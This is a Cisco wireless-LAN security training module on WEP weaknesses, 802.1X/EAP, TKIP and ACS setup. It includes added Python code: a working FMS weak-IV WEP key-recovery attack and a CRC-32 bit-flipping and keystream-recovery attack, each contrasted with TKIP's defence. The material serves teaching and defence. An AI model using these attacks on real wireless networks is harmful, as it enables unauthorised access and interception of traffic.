Presentation published 9 years ago by user Виктория Яшкина
Slide 1: AWLF 3.0, Module 9. © 2002, Cisco Systems, Inc. All rights reserved.

Slide 2: Security

Slide 4: Objectives. Upon completion of this module, you will be able to perform the following tasks:
  - Configure an access point and wireless client to use security measures.
  - Explain how 802.1X can provide better security for a WLAN.
  - Explain how to configure a WLAN to provide the same level of security that a wired LAN provides.
  - Configure Cisco ACS for use with Cisco Aironet products.

Slide 5: Basic Security Features

Slide 6: Enabling Authentication on Access Point

Slide 7: User Information

Slide 8: User Manager

Slide 9: Enabling Access Point Console Security

Slide 10: Additional Method for Enabling Access Point Console Security: Centralized Administrator Authentication

Slide 11: User Password

Slide 12: Security
Slide 13: Why WLAN Security?
  - WLAN equipment is widely available and inexpensive
  - Availability of sniffers
  - Statistics on WLAN security
  - Media hype about hot-spots and WLAN hacking (major electronics retail chain, etc.)
  - War driving (cartoon caption: "I found another one!")
  - This can be controlled from an Access Control Server or any RADIUS server

Slide 14: Older Security Methods. Older forms of security on WLANs:
  - SSID
  - Authentication controlled by MAC address

Slide 15: 802.11 Security: Wired Equivalent Privacy (WEP)
  - 40-bit keys; 128-bit keys optional (a 104-bit key plus the 24-bit IV)
  - Part of the association process
  - Uses the RC4 stream cipher of RSA Data Security, Inc.

Slide 16: 802.11 Open Authentication. Initial connection to an access point, with two candidate access points A and B; every step is an RF packet:
  1. Client sends a probe request.
  2. AP A and AP B send probe responses.
  3. Client evaluates the AP responses and selects the best AP.
  4. Client sends an authentication request to the selected AP (A).
  5. AP A confirms authentication and registers the client.
  6. Client sends an association request to AP A.
  7. AP A confirms association and registers the client.
  Open authentication verifies nothing: any client that asks is authenticated.

Slide 17: 802.11 Shared Key Authentication. Steps 1-3 are the same as open authentication:
  4. Client sends an authentication request to AP A.
  5. AP A sends an authentication response containing the unencrypted challenge text.
  6. Client encrypts the challenge text using one of its WEP keys and sends it to AP A.
  7. AP A compares the encrypted challenge text with its own copy of the encrypted challenge text. If the text is the same, AP A allows the client onto the WLAN.
  Caveat: anyone listening sees both the plaintext challenge and its WEP encryption, and the XOR of the two is the keystream for that IV. That keystream can be replayed to answer a later challenge without knowing the key, which is why shared key authentication is weaker than open authentication with WEP, not stronger.
Slide 18: Configuring the Access Point for WEP

Slides 19-22: Access Point WEP Setup (four slides)

Slide 23: Configuring the Client for WEP

Slides 24-25: Configuring WEP Keys (Aironet Client Utility)

Slide 26: Configuring WEP Keys (cont.): client and access point keys must match!

Slide 27: Configuring WEP Keys (cont.). Up to four keys are configured on both sides (Key1=1234…, Key2=5678…, Key3=9012…, Key4=3456……). The WEP header of each frame carries a key index that tells the receiver which of the four keys was used:
  - Header: use Key3 | Data: encrypted using KEY3 | Trailer
  - Header: use Key2 | Data: encrypted using KEY2 | Trailer

Slide 28: Problems with WEP Security
Slide 29: 802.11 Security Issues: SSID
  - SSID (Service Set Identifier): a string of up to 32 ASCII characters
  - If the access point broadcasts its SSID (802.11 beacons do so by default), any client configured with a NULL SSID will associate to any access point regardless of the SSID set on the access point
  - The SSID should not be considered a security feature

Slide 30: 802.11 Security Issues (cont.)
  - WEP assumes the threat is outside the LAN
  - Hardware theft (a stolen device carries the static key)
  - Rogue APs

Slide 31: 802.11 Security Issues (cont.)
  - Authentication is one-way: the client never authenticates the access point
  - No way to dynamically generate keys
  - No integration with existing network authentication methods on the LAN

Slide 32: 802.11 Security Issues (cont.)
  - Authentication is device-based, not user-based
  - No method for account auditing

Slide 34: Security Suite
Slide 35: 802.1X for 802.11
  - Current security recommendation from 802.11i
  - Based on the EAP framework
  - Improved user authentication credentials:
    - EAP-LEAP: username and static password
    - EAP-TLS: digital certificates
    - EAP-PEAP: server digital certificate plus a username and static password, or one-time passwords
  - Session-based encryption keys
  - Centralized user administration

Slide 36: 802.1X Advantages for WLANs
  - Mutual authentication
  - Encryption keys derived dynamically
  - Ability to refresh encryption keys
  - Centralized user and key management

Slide 37: Improved Security
  - Coverage extending beyond the facility
  - Two-way verification

Slide 38: Improved Security (cont.). (Figure: per-user session keys drawn as differently coloured links, blue, yellow, red and green, between clients and the access point.)

Slide 39: How it Works. The three 802.1X roles, from the public/semi-public network through the enterprise edge to the enterprise network:
  - Supplicant: operates on the client
  - Authenticator: operates on devices at the network edge, such as APs and switches
  - Authentication server: the RADIUS server; the EAP plug-in goes in the RADIUS server

Slide 40: How it Works on the WLAN
  - Supplicant: operates on the client
  - Authenticator: the access point; it passes 802.1X traffic only until authentication completes
  - Authentication server: the EAP plug-in goes in the RADIUS server

Slide 41: 802.1X over Wireless Steps (client, authenticator, RADIUS server)
  1. Associate. The access point ignores all requests other than 802.1X until network logon.
  2. Logon: EAP request; EAP response; RADIUS Access-Request; Access-Challenge; Access-Request; Access-Accept (EAP success).
  3. The RADIUS server authenticates the client; the client authenticates the RADIUS server (the process repeats in reverse).
  4. Client and RADIUS server derive the session WEP key.
  5. The RADIUS server passes the session key to the access point.
  6. Client and access point start using encryption.
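The exchange on slide 41, written out as an added example that is not part of the Cisco module. It simulates the supplicant, the access point (authenticator) and the RADIUS server in Python. The challenge/response and the session key derivation use HMAC-SHA256 as a stand-in for the real EAP method (LEAP's MS-CHAP exchange or the TLS handshake); message names follow the slide, while the field layouts, the user "alice" and every password are constructed for the simulation. It also shows the two failure modes the slide implies: a wrong password (the server rejects) and a rogue access point whose back end does not know the password (the client rejects during mutual authentication, so the port never opens).

```python
import hashlib
import hmac
import os


def prf(secret: bytes, label: bytes, *nonces: bytes) -> bytes:
    """Keyed derivation for challenge responses and the session key.
    Stand-in for the EAP method's own computation (assumption, not LEAP/TLS)."""
    return hmac.new(secret, label + b"".join(nonces), hashlib.sha256).digest()


class RadiusServer:
    """Authentication server: holds the user database, talks only to the AP."""

    def __init__(self, users):
        self.users = users          # username -> password; constructed test data
        self.pending = {}           # username -> challenge sent in Access-Challenge

    def access_request(self, username, client_nonce=None, client_resp=None):
        pw = self.users.get(username)
        if pw is None:
            return "Access-Reject", None
        if client_resp is None:     # round 1: challenge the client
            self.pending[username] = os.urandom(16)
            return "Access-Challenge", self.pending[username]
        s_nonce = self.pending.pop(username, None)
        if s_nonce is None or not hmac.compare_digest(
                client_resp, prf(pw, b"client", s_nonce, client_nonce)):
            return "Access-Reject", None
        # round 2: client proved the password; prove it back and derive the session key
        server_resp = prf(pw, b"server", client_nonce, s_nonce)
        session_key = prf(pw, b"key", s_nonce, client_nonce)
        return "Access-Accept", (server_resp, session_key)


class RogueServer(RadiusServer):
    """Rogue AP's back end: accepts everyone but does not know the password,
    so it cannot produce the server response the supplicant will check."""

    def access_request(self, username, client_nonce=None, client_resp=None):
        if client_resp is None:
            return "Access-Challenge", os.urandom(16)
        return "Access-Accept", (os.urandom(32), os.urandom(32))


class AccessPoint:
    """Authenticator: the controlled port passes only EAP until Access-Accept."""

    def __init__(self, radius):
        self.radius = radius
        self.authorized = False
        self.session_key = None
        self.forwarded = []

    def data_frame(self, frame):
        """Return True if the frame was forwarded, False if dropped at the port."""
        if not self.authorized:
            return False
        self.forwarded.append(frame)
        return True

    def eap(self, supplicant):
        identity = supplicant.eap_identity()                    # EAP Request/Response Identity
        code, challenge = self.radius.access_request(identity)  # RADIUS Access-Request
        if code != "Access-Challenge":
            return "EAP-Failure"
        c_nonce, c_resp = supplicant.eap_response(challenge)    # challenge relayed to the client
        code, payload = self.radius.access_request(identity, c_nonce, c_resp)
        if code != "Access-Accept":
            return "EAP-Failure"
        server_resp, self.session_key = payload   # key arrives over RADIUS, never over the air
        if not supplicant.eap_success(server_resp):
            return "EAP-Failure"                  # client refused the server: port stays closed
        self.authorized = True
        return "EAP-Success"


class Supplicant:
    def __init__(self, username, password):
        self.username, self.password = username, password
        self.s_nonce = self.c_nonce = self.session_key = None

    def eap_identity(self):
        return self.username

    def eap_response(self, s_nonce):
        self.s_nonce, self.c_nonce = s_nonce, os.urandom(16)
        return self.c_nonce, prf(self.password, b"client", s_nonce, self.c_nonce)

    def eap_success(self, server_resp):
        """Mutual authentication: the server must answer this client's nonce with the shared secret."""
        expected = prf(self.password, b"server", self.c_nonce, self.s_nonce)
        if not hmac.compare_digest(server_resp, expected):
            return False
        self.session_key = prf(self.password, b"key", self.s_nonce, self.c_nonce)
        return True


def run(client_password, server_password, rogue=False):
    """Run one logon and report what a practitioner would check afterwards."""
    users = {"alice": server_password}                      # constructed user database
    ap = AccessPoint(RogueServer(users) if rogue else RadiusServer(users))
    sta = Supplicant("alice", client_password)
    before = ap.data_frame(b"data before logon")
    result = ap.eap(sta)
    after = ap.data_frame(b"data after logon")
    return {"result": result, "dropped_before_logon": not before, "forwarded_after": after,
            "keys_match": ap.session_key is not None and ap.session_key == sta.session_key}
```

Note where the session key travels: the supplicant and the RADIUS server each compute it from the password and both nonces, and the access point only ever receives it inside Access-Accept, which is exactly why the RADIUS shared secret and the wired path between AP and server need protecting.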
Slide 42: Supplicant. Use with EAP requires client software, referred to as a supplicant.

Slide 43: O/S Support for EAP Protocol Types
  - Cisco LEAP: Cisco authentication type; quick support on a multitude of host operating systems; the implementation reduces support requirements on host systems
  - EAP-TLS: native support in the Windows XP O/S; third-party supplicants available for other O/S
  - EAP-PEAP: requires 802.1X/EAP support, native in Windows XP

Slide 44: When to Deploy LEAP
  - Complete Cisco WLAN solution
  - Want single login using Windows NT/2000 Active Directory
  - Desire dynamic WEP keys and mutual authentication
  - Recommended to deploy with TKIP
  - Simplifies deployment and administration

Slide 45: When to Deploy EAP-TLS
  - Desire dynamic WEP keys and mutual authentication
  - Recommended to deploy with TKIP
  - Strong desire to use client-side and server-side digital certificates to identify user credentials
  - Already have a Public Key Infrastructure
  - Requires issuing and maintaining user certificates
  - Capability to tie login with NT/2000 and LDAP

Slide 46: When to Deploy EAP-PEAP
  - Desire dynamic WEP keys and mutual authentication
  - Recommended to deploy with TKIP
  - Strong desire to use OTP for user authentication
  - Requires a digital certificate on the server side only
  - Capability to tie login with NT/2000, LDAP, NDS, OTP servers, SQL

Slide 47: Non-802.1X Approach: VPN over WLAN
  - Alternative to 802.1X over WLAN
  - VPN/IPsec over WLAN
  - Provides 3DES encryption
  - Provides centralized user authentication and administration
  - Components: VPN concentrator; DHCP/RADIUS/OTP servers; access point

Slide 48: 802.1X Wrap-Up
  - 802.1X WEP keys are still WEP keys
  - Recommend TKIP and strong passwords
  - Per-user authentication
  - Per-user dynamic WEP keys
  - Ability to change keys

Slide 49: Cisco WLAN Security Suite
  - LEAP: 802.1X authentication; support for operating systems that do not have built-in EAP support
  - TKIP: message integrity check; per-packet key hashing; broadcast key rotation

Slide 50: WEP: Security Enhancements
  - IEEE Task Group i is working on enhancements to mitigate WEP vulnerabilities: Temporal Key Integrity Protocol (TKIP); 802.1X for 802.11; AES (to replace WEP)
  - Cisco supports an early implementation of the IEEE Task Group i recommendations (TKIP): IV key hashing; MIC; broadcast key rotation for LEAP

Slide 51: WLAN Attacks
Slide 52: WEP Attacks
  University of California, Berkeley | February 2001 | Focuses on static WEP; discusses the need for key management
  University of Maryland | April 2001 | Focuses on authentication; identifies flaws in one vendor's proprietary scheme
  Scott Fluhrer, Itsik Mantin, and Adi Shamir | July 2001 | Focuses on inherent weaknesses in RC4; describes pragmatic attacks against RC4/WEP
  "In practice, most installations use a single key that is shared between all mobile stations and access points. More sophisticated key management techniques can be used to help defend from the attacks we describe…" (University of California, Berkeley report on WEP security)

Slide 53: AirSnort Weak IV Attack
  - The attack is based on the Fluhrer/Mantin/Shamir paper
  - The initialization vector (IV) is a 24-bit field, sent in the clear, that changes with each packet
  - The per-packet RC4 key is IV || base key, fed to RC4's Key Scheduling Algorithm, so the attacker always knows the first three bytes of the key
  - For certain "weak" IVs the first keystream byte leaks information about the next unknown key byte, and the first plaintext byte of every data frame (the LLC/SNAP header, 0xAA) is predictable, so the first keystream byte is known
  - More packets = more weak IVs = better chance to determine the base key
  - To break the key, the attacker needs roughly 100,000 to 1,000,000 packets
  WEP frame: dest addr | src addr | IV | encrypted data | ICV

Slide 54: TKIP: WEP Key Hashing
  - No key hashing: IV || base key -> RC4 stream cipher -> XOR with plaintext -> encrypted data. The RC4 key begins with the IV that is sent in the clear.
  - Key hashing: hash(IV, base key) -> packet key -> RC4 stream cipher -> XOR with plaintext -> encrypted data. Because the packet key is a hash of the IV and the base key, the IV no longer gives insight into the base key.
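Slides 53 and 54 together, as an added example that is not part of the Cisco module and not AirSnort's code: a Python implementation of the Fluhrer/Mantin/Shamir weak-IV vote against static WEP, run over a constructed capture, and the same attack run against packets whose per-packet key is hashed. RC4 is implemented in full because the attack replays part of its Key Scheduling Algorithm. The capture, the 40-bit key 01:23:45:67:89 and the frame body are constructed; the ICV is left out because the attack only needs the first ciphertext byte. The key-hashing function is a SHA-256 stand-in for TKIP's mixing function, not the real one; what matters is that the per-packet key no longer starts with the public IV.

```python
import hashlib
from collections import Counter

SNAP = b"\xaa\xaa\x03"   # LLC/SNAP header: first plaintext bytes of every 802.11 data frame


def rc4(key: bytes, n: int) -> bytes:
    """RC4: Key Scheduling Algorithm over `key`, then n bytes of keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_packet(iv: bytes, base_key: bytes, plaintext: bytes, hashing: bool = False):
    """Encrypt one frame body (ICV omitted). Plain WEP uses IV || base key as the
    RC4 key, so the attacker knows the first three key bytes. With key hashing the
    per-packet key is a digest of IV and base key (stand-in for TKIP's mixing
    function, an assumption) and has no known prefix."""
    if hashing:
        pkt_key = hashlib.sha256(iv + base_key).digest()[: len(base_key) + 3]
    else:
        pkt_key = iv + base_key
    ks = rc4(pkt_key, len(plaintext))
    return iv, bytes(p ^ k for p, k in zip(plaintext, ks))


def fms_vote(known_key: bytes, out0: int):
    """One FMS vote for the key byte that follows `known_key` (IV plus the secret
    bytes recovered so far). Needs an IV of the form (A+3, 255, X); returns a
    candidate byte, or None when the state is not 'resolved' after A+3 KSA steps."""
    A = len(known_key) - 3
    S = list(range(256))
    j = 0
    for i in range(A + 3):                         # replay the KSA steps we know
        j = (j + S[i] + known_key[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
        return None
    # With roughly 5% probability the first keystream byte equals S[A+3] after the
    # next KSA step, which pins down j at that step and therefore the unknown key byte.
    return (S.index(out0) - j - S[A + 3]) & 0xFF


def recover_key(packets, key_len: int):
    """AirSnort-style recovery: vote byte by byte over weak-IV packets, then verify
    a candidate key by decrypting packets with ordinary IVs (known SNAP header)."""
    check = [(iv, ct) for iv, ct in packets if iv[1] != 255][:4]

    def verify(key):
        return all(bytes(c ^ k for c, k in zip(ct[:3], rc4(iv + key, 3))) == SNAP
                   for iv, ct in check)

    def search(known):
        if len(known) == key_len:
            return known if verify(known) else None
        votes = Counter()
        for iv, ct in packets:
            if iv[0] == len(known) + 3 and iv[1] == 255:
                vote = fms_vote(iv + known, ct[0] ^ SNAP[0])  # keystream byte 0 from known plaintext
                if vote is not None:
                    votes[vote] += 1
        for cand, _ in votes.most_common(5):                  # backtrack over the best candidates
            found = search(known + bytes([cand]))
            if found is not None:
                return found
        return None

    return search(b"")


def capture(base_key: bytes, hashing: bool):
    """Constructed capture: every weak IV (A+3, 255, X) for each key byte, plus a few
    ordinary IVs. The body is a SNAP header followed by the IP ethertype."""
    body = SNAP + b"\x00\x00\x00\x08\x00"
    pkts = [wep_packet(bytes([a + 3, 255, x]), base_key, body, hashing)
            for a in range(len(base_key)) for x in range(256)]
    pkts += [wep_packet(bytes([x, 0x10, x]), base_key, body, hashing) for x in range(8)]
    return pkts


def demo(hashing: bool = False):
    """Returns the recovered 40-bit key, or None when the votes are noise."""
    base_key = bytes.fromhex("0123456789")      # constructed static WEP key
    return recover_key(capture(base_key, hashing), len(base_key))
```

With plain WEP the 256 weak IVs per key byte give the correct byte a clear majority of votes, and the verification step against ordinary IVs catches the occasional wrong byte. With the hashed per-packet key the same votes are evenly spread, no candidate passes verification, and the attacker gets nothing from the IV.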
Slide 55: Bit-Flipping and Replay Attack
  1. The attacker intercepts a WEP-encrypted packet.
  2. The attacker flips bits in the packet and recalculates the CRC-32 ICV. CRC-32 is linear, so the correction to the encrypted ICV can be computed without the key.
  3. The attacker transmits the bit-flipped frame with the known IV to the access point.
  4. Because the CRC-32 is correct, the access point accepts and forwards the frame.
  5. A Layer 3 device rejects the frame and sends a predictable response.
  6. The access point encrypts the response and sends it toward the attacker.
  7. The attacker XORs the predictable plaintext with the ciphertext to recover the keystream for that IV (a stream cipher leaks its keystream wherever plaintext and ciphertext are both known), which is then reused to decrypt or forge frames under that IV.
  (Figure: message XOR keystream = ciphertext; ciphertext XOR predicted plaintext = keystream.)

Slide 56: TKIP: Message Integrity Check (MIC)
  WEP frame with MIC: dest addr | src addr | IV | [ seq # | plaintext | MIC | ICV ], the bracketed part encrypted with the stream cipher.
  - Sender computes a keyed MIC over the data and adds it to the packet before encryption.
  - Recipient examines the MIC and discards the packet if the MIC is not intact; the sequence number lets it discard replayed frames.
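The attack on slide 55 and the defence on slide 56, as an added example that is not part of the Cisco module. The keystream is a constructed stand-in for what RC4 would produce for one IV, because the attack never touches the cipher: it only relies on the ICV being a CRC. The receiver check, the frame "to:10.0.0.5 GET /" and the MIC key are constructed, and HMAC-SHA256 truncated to 8 bytes stands in for TKIP's Michael MIC (it is not the Michael algorithm). The block shows the bit flip being accepted by the WEP receiver, the same flip being rejected once a keyed MIC is inside the encrypted body, and the keystream recovery from a predictable reply.

```python
import hashlib
import hmac
import zlib

# Constructed stand-in for the RC4 keystream WEP would produce for one IV.
# The attack below never uses the cipher, only the fact that the ICV is a CRC.
KS = hashlib.sha256(b"constructed keystream for IV 00:00:01").digest() * 3
MIC_KEY = b"constructed per-session MIC key"


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_seal(keystream: bytes, plaintext: bytes) -> bytes:
    """WEP body: plaintext || CRC-32(plaintext) as ICV, all XORed with the keystream."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return xor(plaintext + icv, keystream)


def wep_open(keystream: bytes, frame: bytes):
    """Receiver: decrypt and return the plaintext if the ICV matches, else None."""
    body = xor(frame, keystream)
    data, icv = body[:-4], body[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Attacker: XOR `delta` into the encrypted data and fix the encrypted ICV
    without knowing the key. CRC-32 is affine over XOR, so for equal lengths
    crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros); the correction depends only on d."""
    assert len(delta) == len(frame) - 4
    fix = zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))
    return xor(frame, delta + fix.to_bytes(4, "little"))


def recover_keystream(frame: bytes, predicted_plaintext: bytes) -> bytes:
    """Attacker who can predict a frame's plaintext (e.g. the router's error reply
    to a mangled packet) recovers the keystream for that IV: ks = ct XOR pt."""
    icv = zlib.crc32(predicted_plaintext).to_bytes(4, "little")
    return xor(frame, predicted_plaintext + icv)


def mic_seal(keystream: bytes, mic_key: bytes, plaintext: bytes) -> bytes:
    """TKIP-style: a keyed MIC over the plaintext goes inside the encrypted body.
    HMAC-SHA256 truncated to 8 bytes stands in for the Michael MIC (assumption)."""
    mic = hmac.new(mic_key, plaintext, hashlib.sha256).digest()[:8]
    return wep_seal(keystream, plaintext + mic)


def mic_open(keystream: bytes, mic_key: bytes, frame: bytes):
    """Receiver: ICV first, then the keyed MIC; any bit flip breaks the MIC."""
    body = wep_open(keystream, frame)
    if body is None:
        return None
    data, mic = body[:-8], body[-8:]
    expected = hmac.new(mic_key, data, hashlib.sha256).digest()[:8]
    return data if hmac.compare_digest(mic, expected) else None


def run_attack():
    """Returns (what the WEP receiver accepts after the flip, what the MIC receiver
    accepts, whether the keystream was recovered from a predicted reply)."""
    plain = b"to:10.0.0.5 GET /"          # constructed frame; byte 10 is the last host digit
    delta = bytes(0x0C if i == 10 else 0 for i in range(len(plain)))   # turns '5' into '9'
    wep_frame = wep_seal(KS, plain)
    wep_result = wep_open(KS, flip_bits(wep_frame, delta))
    mic_frame = mic_seal(KS, MIC_KEY, plain)
    mic_result = mic_open(KS, MIC_KEY, flip_bits(mic_frame, delta + bytes(8)))
    leaked = recover_keystream(wep_frame, plain) == KS[: len(plain) + 4]
    return wep_result, mic_result, leaked
```

The attacker does not need the plaintext to flip bits, only a guess at where the field of interest sits: the delta is applied blind, and the ICV correction is a function of the delta alone. The MIC receiver still runs the ICV check first, which the forged frame passes; it is the keyed MIC, computed over the plaintext under a key the attacker does not have, that rejects it.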
Slide 57: Recommendations to Customers
  - Upgrade to the latest Aironet software (TKIP functionality, pre-standard version): key hashing nullifies the weak IV attack; the message integrity check nullifies the bit-flipping/replay attack
  - Deploy 802.1X for 802.11: use stronger passwords and mutual authentication; use keys that are dynamic, not static; implement a policy to time out WLAN sessions and change keys
  - As a last resort, use static WEP keys on non-Cisco clients: talk to client vendors about plans to support the WEP enhancements and 802.1X authentication types; change static keys as often as practical

Slide 58: Configuring WLAN Devices for Authentication

Slide 59: Supported Devices
  - Client (supplicant) role: client adapter, non-root bridge, repeater access point, workgroup bridge
  - Authenticator role: root access point, root bridge

Slide 60: Enabling Authentication on Access Point

Slide 61: Defining an Authenticator

Slide 62: WEP Configuration on the Access Point

Slide 63: Configuring the Access Point for MIC

Slide 64: Configuring the Access Point for WEP Key Hashing

Slide 65: Enabling Broadcast WEP Key Rotation

Slide 66: Configuring the Client for Authentication

Slide 67: Enabling LEAP on the Client

Slide 68: Configuring LEAP on the Client

Slide 69: Configuring Non-Root Devices for Authentication

Slide 70: Using LEAP with Non-Root Devices. Non-root bridges and repeater access points must be configured to authenticate through the root device.

Slide 71: Configuring a Non-Root Device for LEAP Authentication
Slide 72: Configuring Cisco ACS

Slide 73: Cisco ACS: Main Screen

Slide 74: Network Configuration

Slides 75-76: Access Server Setup Example

Slide 77: External User Database

Slides 78-81: External User Database: Windows NT/2000

Slides 82-84: Session Policy Setup

Slide 85: User Setup

Slides 86-87: User Setup in ACS

Slides 88-91: User Setup in ACS: New User

Slide 92: Windows 2000 User Setup: Dial-In Permission
Slide 93: MAC Address Authentication
  - Use for devices not capable of performing EAP authentication
  - The username and password sent to the RADIUS server are both the device's MAC address
  - Caveat: the MAC address travels in the clear in every frame and is trivially spoofed, so this identifies a device but does not authenticate it

Slides 94-95: MAC Address Authentication: Access Point Setup

Slide 96: Security Evaluation
  - Encrypted WLAN statistics: attackers are more likely to attack unsecured WLANs
  - Proper planning and implementation
  - Estimate potential security threats and the level of security needed
  - Evaluate the amount of WLAN traffic being sent when deciding among the WLAN security options

Slide 97: Summary. Upon completion of this module, you will be able to perform the following tasks:
  - Identify security issues and concerns associated with WLANs and how to overcome these issues
  - Help the customer choose the proper level of security to maintain their current level of network security on their new WLAN
  - Configure clients, APs, and Cisco ACS to take advantage of the security features

Slide 98: Review Questions
  - What WEP key size(s) does the Wi-Fi (802.11) specification define?
  - Why should the SSID not be considered a security feature?
  - What is the advantage of two-way authentication?
  - Why are security measures beyond WEP needed?
  - What is required on the client to use the EAP and 802.1X security features?